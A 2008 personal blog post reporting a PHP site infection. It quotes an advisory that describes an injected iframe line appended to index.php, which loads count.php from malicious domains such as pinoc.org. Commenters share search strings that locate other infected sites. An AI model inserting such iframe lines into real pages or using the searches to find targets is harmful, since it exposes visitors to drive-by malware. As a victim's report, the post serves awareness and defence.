Tuesday September 30, 2008 
Tuesday September 30, 2008
wsxhost.net PHP virus/trojan infection via iframe code injection
One of my domains just got hacked. It must have happened sometime in the past 24 hours because I check on all my domains multiple times per day, and it was just picked up by the corporate firewall.
According to this site :
A lot of popular scripts developed for PHP 4 are currently being hacked through a tmp directory exploit ... it manifest's itself in an appended line in index.php (pls check also administrator/index.php), which through an iframe makes an ulr query (GET) to a count. php file. External website varies (depends on infected slaves/hosts) bit can be picnoc.org, picnoc.info or wsxhost.net. The code line (appended last in above mentioned files) resembles "<iframe src="http://pinoc.org/count.php?o=2" </iframe>
- It's safe to say that all the .html and .php files are infected (I did a check). As of now, sub-domains are still safe for the moment, they are only infecting the main URL (www.[domain].com, etc).
Seems that there are a lot of PHP hacks going on these days. Just a week ago or so, a popular parenting forum of which I am helping out with also got registration-spammed, even through the CAPTCHA - they were using the default PHPBB CAPTCHA though so I'd suppose that has gotten broken and leaks like a sieve by now.
Owners of PHP-based sites beware!
(2008-09-30 18:18:56 SGT)
[Tech]
Permalink
Comments [3]
Post a Comment:
Comments are closed for this entry.
Most popular blog postings on lowem.log :
1. Singapore MRT rail network length to double by 2020
2. 2010 Nissan Leaf electric car specifications : 107hp, 24KWh lithium-ion batteries, 100-mile range
3. Live spot gold price quotes chart on COMEX
4. 2010 Toyota Prius specifications released : 50 mpg, 1.8L, 134hp, Ni-MH, solar roof option
5. AVG Anti-Virus Free Edition 2011 direct download link
6. Real-time live gold and silver price quotes chart on COMEX
7. Singapore electric vehicles : Government agencies EMA and LTA to study EV introduction
8. Book review : Shut Down by William Flynn
Featured articles on lowem.log :
1. Book review : Shut Down by William Flynn
2. Singapore electric cars testing starts with 9 electric vehicles
3. Honda, GS Yuasa JV to make lithium-ion batteries for 2010/2011 Honda Civic Hybrid
4. 2010 Honda Civic Hybrid preliminary specifications released
5. 2010 Honda CR-Z hybrid, 2010 Honda Fit/Jazz hybrid models confirmed
6. 2010 Toyota Prius specifications released : 50 mpg, 1.8L, 134hp, Ni-MH, solar roof option
7. NYMEX crude oil recovers from $32.40 low after 2.2 mbpd OPEC production cut announced
8. Singapore : Nuclear power not ruled out
| search |
|
|
| sponsored links |
|
|
| bookmarks |
|
about
blogroll
sites
quotes
charts
historical |
| navigation |
| decals |
|
| powered by |
|
| hosted by |
|
Maybe you can use this information to solve it.
http://forum.joomla.org/viewtopic.php?f=432&t=329768&p=1432932
Posted by Marco on September 30, 2008 at 08:37 PM SGT #
You're not alone. As of 9:56am Central Time (Chicago - home of the Cubs AND Sox)
Google search shows 96 other sites via: intext:pinoc.org/count.php
3 other sites via:
intext:pinoc.info/count.php
and 199 pages via:
intext:"count.php?o=2"
Many exploits out there. Just curious, how do you check your website? Browser? Or do you actually look at the code (View Source)?
Posted by Tom Raef on September 30, 2008 at 11:02 PM SGT #
Joomla has been affected.
what the best way to protect?
Posted by Juan on October 04, 2008 at 05:47 AM SGT #